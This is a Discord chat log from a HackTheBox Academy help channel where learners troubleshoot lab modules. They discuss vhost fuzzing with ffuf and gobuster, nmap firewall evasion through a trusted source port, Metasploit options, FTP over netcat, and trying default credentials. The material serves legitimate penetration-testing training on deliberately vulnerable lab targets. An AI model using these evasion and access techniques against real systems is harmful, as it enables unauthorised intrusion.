Thanks 👍

If you use chatgpt and look up “python frameworks to complement CPTS” for example you can just do the documentation tutorials for those frameworks

If you know python

If your good at all of that you’ll be fine

Tbh

Thanks bro, i just begin from zero.

Then learn python basics for free

Thank you 💯

I did a crappy github course but you can also youtube it

There’s plenty of entry level python courses on youtube

I subscribed htb academy for 1 year.

I borrow money from my friend!!

Okay

I'll do my best, thanks.

Do HTB Academy to learn to hack

And get the certs. Use HTB Academy to learn the basics too

I recommend starting with infosec foundations.

Thanks bro.

Good Afternoon guys someone can help me with this please?

#programming

It's related to one of the new AI modules I believe

Oh ok

Ya then it can go here

I guess they are starting to implement Python in modules then

Bit by bit

The error states model_joblib isn't defined, is it defined in "spam detection_model.joblib"?

Hey everyone, I don't know whether this is the right place to post this...I have a question that stemmed from a module, but it isn't to do with the module per se. 😅 I'm going through the DCSync section of Active Directory Enumeration & Attacks, and I'm wondering about the statement It is common during an assessment to find other accounts that have these rights — could anyone provide some use cases wherein this permission set would be configured for a non-admin account? My first thought was backup services/jobs for AD, but I'm curious about any others. (Understanding why this would appear in the wild will help me retain the info better.)

I think so

A temporary account that was set up during install that wasn't removed, someone's job role changed, etc

i think I'm failing something but i don't know

Didn't even consider housekeeping issues. Thanks @fathom pendant 🙂

Instead of thinking so, know so.

Dive into the joblib and see if it's defined

thanks bro

It doesn't inspire confidence when you say "i think so" when asked a direct question about something, it means you're unsure/don't actually know

😅

things of noob xD

You've been struggling on this module for a few weeks now and plenty of people have nudged you

Perhaps AI just isn't your thing and you should put the fries in the bag

JAJAJAJAJAJAJAJJAJAJAJAJ

you're very kind

I mean, when you're struggling this hard, and seemingly making snails pace progress and rushing to discord...

Hi, I am struggling with this module, Target(s): 94.237.50.80:50074

Life Left: 86 minute(s)
vHosts needed for these questions:
inlanefreight.htb

• 1 Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb" , I also edited /etc/host and stiill nothing.. what I am doing wrong ?

I also tried with a different wordlist and still nothing 😦

You need to tell it what --domain to append

It doesn't magically know

Was gonna say

Also what does your hosts file look like?

You need to add port number with the IP address, in the /etc/hosts file

Made the mistake of only adding IP address

I will send a picture of host file after then scan completes

I added ip and inlanefreight.htb

this was the mistake I guess

still didn t find anything 😦

@fathom pendant i don't care what you tell me. I will get it 😉

This is incorrect btw

You don't put the port in the hosts file

ok.. so what should I correct beside the port?

--domain is a separate flag btw

Not part of --append-domain

so how should the command be ?

--append-domain --domain inlanefreight.htb

You have several IPs of the. Domain inlanefreight.htb assigned, this leads to problems.

Well specifying the ip as part of the request i don't think would make that matter

Also it's /etc/hosts not /etc/host

ohh..

I don't know if Gobuster accesses it.

aand... it worked, thanks man I apreciate your pacience 😅

@nimble scroll Spoiler/answers in your screenshot

ok

I will delete now, thanks again

I already deleted the one with answers

allright

Yeah you don't, just looked at my notes, the mistake I made WAS PUTTING THE PORT. My bad hehe

You won't make the mistake again

It's also important to edit the hosts file not the host file

:( well in one way im glad im not the only one

Thank god for payload bunny tho they saved me a world of confusion last night

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://94.237.54.190:46718 -H 'Host: FUZZ.academy.htb'

:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.academy.htb

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:46718 -H 'Host: FUZZ.academy.htb'

stilllll nootthhininnggg

i reset it and add the ip to the hosts file

Skill assessment for ffuf module yeah?

yes

Hold on

94.237.54.190 academy.htb

Spun up a machine and ffuf on my end got results near instantly

The expected subdomains are all in the 5000 wordlist

i try another vpn moment

You don't need the vpn for this

It's a public IP and port

Yeah there's something wrong with your target spawn

it was my private vpn

is function now

You mean a vpn not from htb?

Or?

correct

from my host

Ah that may do it if they ratelimit you

only lost a night

Hello, I am facing something in Public Exploits in pentesting.
When i am solving the question, firstly I nmap scanned the target, it showed OpenSSH 9.2p1 and rcbind as the open services.

When I come to searchsploit the openssh 9.2p1 there was no results. I checked the hint and it said search for plugin exploits

I want to know, why plugin ??
When i entered the msfconsole and serched for plugin, there were +200 exploits for it. So should I proceed with them all or should I scan specific one from it ? and why plugin specifically ?

hey everyone in the last module of nmap can anybody explain what i am looking for ?

you don't need to nmap the target

you're given an IP and port to work with

that's your scope

oki, so what about plugin ??

it's a web server

is it becuase the content of the page has plugin so I am searching for that ?

enumerate info based off of what i just told you

correct

so if I am thinking correctly, we are looking for an exploit for plugin 2.7.10

Not sure if this is the right place to ask, but are there any modules on like android pentesting or forensics?

because that's the version of the plugin available on the website

so can anybody help me on the last chapter of the nmap network enumaration
if possible offcourse ?

nope there are no mobile testing module

https://tenor.com/view/vldl-vldl-dnd-vldl-rowan-vldl-dnd-rowan-vldl-think-gif-3776085315084600711

it helps if you elaborate a bit on what you're stuck on

you've just said you're stuck on the section without saying much beyond that

are you stuck at the beginning

did you find a service and don't know what to do next

oh okay sorry i thought u were bussy
but i am on the last but i don't know what i am looking for i have done a lot of scans but don't seem to find a lead

So proud of myself actually

i only get an appache service and a ssh

Darn, id really like to see that one day. Mobile forensics is something iv been wanting to check out for a while

re-read the IDS/IPS evasion section re: DNS spoofing

something about source ports

okay thanks a lot
i appreciate it

you can replace the specific port they use with -p-

but then i scan all ports right ?

correct

what you're looking for may not be on a default port/default service

but why would i want that wouldn't that be hella suspicous and detectable ?

don't concern yourself with that detail

i've done this section while only triggering a handful of detections

you're assuming the firewall/IDS/IPS is set up properly :)

how do u know ur detected because i tought it was only the first excercise

oh really damn
i need to study up on that stuff huh

the http://ip/status should tell you

you don't really need to study up on it

i'm telling you where you're mistake in logic is

okay sorry i wanna circle back to that source ip i have been using 5 decoys so that is what your saying ?

you're making an assumption based on incomplete details; you're assuming the sys/netadmin properly set the tools and firewall rules up

not source ip

source PORT

decoys are absolutely not necessary

oh okay
i see what your saying i can use another port for the scans to make it seam like i am a genuine a http connection?

مين عربي

English only for this server

Okay

or other common trusted ports

I have some experience on hacking but I want someone to teach me because idk where to complete now

Check out the skill or job role pathways on htb and follow that

Okay

okay okay i am still a little confused i will be back got some reading to do

Can do #

Can u do

no one here is gonna teach you for free

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

htb academy is a paid resource (with some free content [tier 0 modules])

I already know that. Xd

otherwise you can google a lot of the stuff to learn

hey can somebody help me with skill assesment in intro to assembly language? I am doing what they say you to do yet in first part the shellcode doesnt display the flag

i offer a paid mentorship and tutoring to go through the pentester pathway for #cpts [not affiliated with htb]

Okay

oh okay damn that is interesting XD

hii

i want to get into a database

what academy module is this for?

if it's your school's database, you can go kick rocks as that's illegal (see #rules)

no my own sql

well if it's your own database just log in

¯_(ツ)_/¯

no i want to test it for security

but this isn't a support chat for general issues; read and follow #welcome to access more channels

like pentesting

ok

as this channel is specifically for htb academy modules;
there's 2 modules that I can think of that get your foot in for SQL databases (well more if it's a web based application, SQLi)

Hello

I am deliberately about to give up

Why

Footprinting, Attacking Common Services, SQL Injection Fundamentals
https://academy.hackthebox.com/module/details/112 Footprinting
https://academy.hackthebox.com/module/details/116 Common Services
https://academy.hackthebox.com/module/details/33 SQL Injection Fundamentals

if anybody happens to have this mistake here make sure u run the shellcode for amd64 not i386

okay i am so i am back but i am a little fuzzy on what the --dns-server flag does and the benefit it has does anyone perchance have a clear explanation or a recourse for it ?(for nmap btw sorry)

you're looking at the wrong thing

Does Zenmap works on Kali Linux anymore?

--dns-server specifies the name server to use instead of the nearest public server

or whatever default server would be used

oh okay but ur talking about the source port
so that changes what port u send the packets from
but how do i know what port the firewall trusts like i just use commonly used for services like dns or sum?

my hint mentions specifically source port

correct and there's a portion of the reading that specifically deals with source port

i know i saw but i will go again sorry i've been stuck on this for some time XD

and explains how certain things may be mistrusted

implicit allow for all traffic coming from port 53

instead of specific addresses

i forgot zenmap was a thing, i don't mess too much with GUI tools

I got the exploit
I set RHOSTS to the IP of the machine
I already knew that check is not operatable on this vulnerability

when I run exploit, it tells me Auxiliary module execution complete

but idk whether i am now inside the machine or not. I tried running ls. I got alot of files but none of them is flag

Sir ethical hacking is quite difficult I tried to learn from tutorial from YouTube but still I can understand them

Am I track or I lost my target ?

the exploit isn't RCE or a remote shell

read the exploit name carefully

also when it completes it'll tell you where it saved the file to

did you set the RPORT to the given port?

https://tenor.com/view/tolarian-community-college-kyle-hill-magic-the-gathering-i-hate-your-deck-reading-the-card-gif-22381436

biggest thing when using msfconsole, is the options command

hey thanks for the tip i found a new service now i just need the version of the service
back to trying i guess

Shall set the three ??
RHOSTS
LHOST
RPORT ??

LHOST won't be required as the proper exploit isn't a reverse_shell

from reading the explaination, it said any option with required set to yes needs to be set

you need to adapt to the given conditions

but there were options having required set to yes that he didnt set them

the ip and port are given to you RHOST which is the IP given; RPORT is the port given

otherwise it defaults to http/80

which will get you nowhere fast

R- Remote

L- Local

Hi guys, can someone please help me with CWEE - Advanced Sql Injection - Read and write files?

I’ve created a payload working just to pg_sleep(15) but I cannot go for more that it

just because it "isn't required" doesn't mean you don't have to change it

RPORT defaults to 80 (HTTP) but your web server you're attacking isn't on port 80, is it

yes

no, it isn't

it is on port 56461

correct

so you need to change the RPORT to match that

you don't put IP:PORT as RHOST

can your rephrase this cuz i didnt understand

well I don't know how you have your options set up

RPORT - remote port

I set the RHOST to the IP of the machine

the port that you're telling msfconsole to connect to to perform the exploit

it needs to be the port that the web server is running on

when you run the exploit it grabs a FILE

I see alot of intresting things here in show options

the question gives you a filepath for the flag.txt

sry

anyway venturing into spoiler territory, you should be able to work it out from here

i'm not getting paid to hold your hand through each step

I am just trying to understand each step I am doing

break down the question into important information required
IP
PORT
File location/name

translate that to what you need to do to exploit

how can i interact with a idbm db2 ?

hey thx @fathom pendant
i found the flag u were a big help

don't worry about that

i still don't completly understand

in short:
request comes in from your machine with a trusted source port, firewall is misconfigured to allow all requests that have the trusted source port

okay that part is clear because it is normally for dns trafic

but what confuses me is what netcat does and how i get a flagg immediatly ?

it's assuming the request is coming from a dns server and allowing it

you can't get it 'immediately' you just need to have some patience

netcat just connects to a remote service on port
nc ip port
with -p you're specifying YOUR port

yea yea but what does netcat do that it give me back a flagg while the question ask for a version ?

220 is a tcp server reply no ?

the flag is the version

220 {version of service}
220 is just a status code meaning it's ready for commands

if you know your l33t5p34k you can look closer at the flag

😉

but in this case it's configured that the version banner is a HTB{FLAG}

i am sorry i feel a hint or a joke but i got no clue all i see is leetspeak ?

ah nvm i was thinking of a different lab

oh okay thx u explained very well i understand now

ignore the l33tsp34k

but the answer is the HTB{k..6}

let me tell you something clown, I have made all the steps right and was soon to take my hair off.

Just because the time of the IP has expired and I had to restart the IP, but I didn't pay attention to that.

don't know why you had to call me a clown

no no not u

it is me the clown

yea i found the flag i completed it
thx for the help
i still got a long way to go i wanna start doing like machines on the labs but i am trying to get the right skill if u got suggestions i am all ears

Thx for the help buddy, you are so helpful and I really appreciate that.

biggest thing: enumeration is recursive
once you find something new with your enumeration, you start the enumeration over again with the new information

90% of your time is gonna be spent just looking at stuff

so u mean with different tools or ?
but the thing is isn't this a bad habbit because the target will detect i am doing it no ?

you're assuming the target is fully defended

htb labs are meant to be vulnerable

ah offcourse that is a big help but what module should i do next ?
sql injections or sum

i suggest the information security foundations path

okay okay i get it but irl because i kinda wanna prep for a job
can i just do this ?

you'd be surprised how often things are left open

when researching for a lab i was working on i found an open login on a public IP with default creds

so like admin admin ?

something like that

This is taught in the information Foundation path ?

default cred stuff is sprinkled all around

oh okay that is cool so u should allways test for that stuff

the Information Foundation Skill Path gives you solid networking, Linux, and Windows foundations

before bruteforcing: try simple

allright i bought when u suggested but i am running out of cubes XD

My cybersec instructor always advices me to try simple things before going to complex

sometimes it works

you don't have to buy the modules all at once

when you complete a t0 module you get the 10 cubes back

yea no but i am done wiht all the ones i did just like the linux fundamentals and then now nmap

so next i am gonna do the one u suggested

nmap is a t1 module

yea no i gott make that habit

complete one before moving on to the next

good knowledge builds off solid foundations

Do you see that pentesting is a good start for a noob ?

i am doing that rightnow but thanks for the help

my goals is to get the cap machine

the pirate one

Is there a way to get the PWN box distro or do we just need to setup our own Parrot VM?

To clarify I have access to the PWNbox on the academy and I like how it operates, just through it be nice to have my own VM distro thats a mirror of it.

In the official Parrot website there is a “Pwnbox” version but it’s basically a clean Parrot with just the visual modifications

I have a simple question. I am doing module Information Gathering - Web Edition . And section "Creepy Crawlies" lets me use a Reconspider script. However, it seems to do nothing. Or is that a user error (me)?

It will output a file in your current directory

@fathom pendant Could you give me some help?

I am doing the Attacking WPA/WPA2 Wi-Fi Networks - Skills Assessment, there is just one question left.
I am getting a certificate error on the hostapd-wpe even after patching it.

Thought so too. But the script just sits there, saying there is a telnet listener.

i haven't touched that module

Nvm. PEBCAK moment. I somehow had a line in /etc/hosts for that fqdn.

😦

(Problem Exists Between Chair And Keyboard)

I also did not do that module (yet).

Ok…

it should output Results.json or something like that

jq -r '.*' Results.json will print all things
jq -r '.<category name>' Results.json will print that specific category

i.e. emails, comments, etc

@remote fulcrum 👆👆

learning how to parse things with jq is OP

What’s op?

OP = Over Powered

I’ll add it to my slang dictionary😂

I agree jq is great

hi, idk if this is the correct channel but i have a question about NetCat. If anyone can dm me please, its quick (I think) thanks

it's best if you just ask your question here or in #programming or #1024429874246590575

@pliant jewel what is the section name you are working on

you don't need to do any special math

Skills Assessment

yeah not sure why they have you do all this nonsense with netcat

xd

ftp ip

much simpler

lol

Hi I have a question, for IPMI enumeration, is there a way to know which BMCs used? footprinting module

why did i have to do all that ??

thanks mate

it'd be discovered via scanning

it works perfectly

likely to just understand how it works behind the hood

but it heavily overcomplicates the process

question: did you close the ftp connection (in netcat) when you tried to connect to the higher port to listen in on the control channel?

if so; that's why it failed because you terminated your initial connection

Only version is discovered

yep, i did that

Thats why it failed the connection, because you no longer had an active ftp session running so the port was closed

now how can i do "RETR"?

if I do RETR --> ?Invalid Command

Retr filename.txt

?

If not "get" is a valid verb

I think my internet doesnt wanna work today

I did "get" but anything happend

now it worked

thanks one more time

Hi, quick question for the Wordpress module
I'm the vln assessment and there is the "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." question.
I skipped this question as I did not identify where to download a file, and the wpscans did not reveal anything of the sort.
Am I complicating things ? Or is there something I have missed ?
Thank you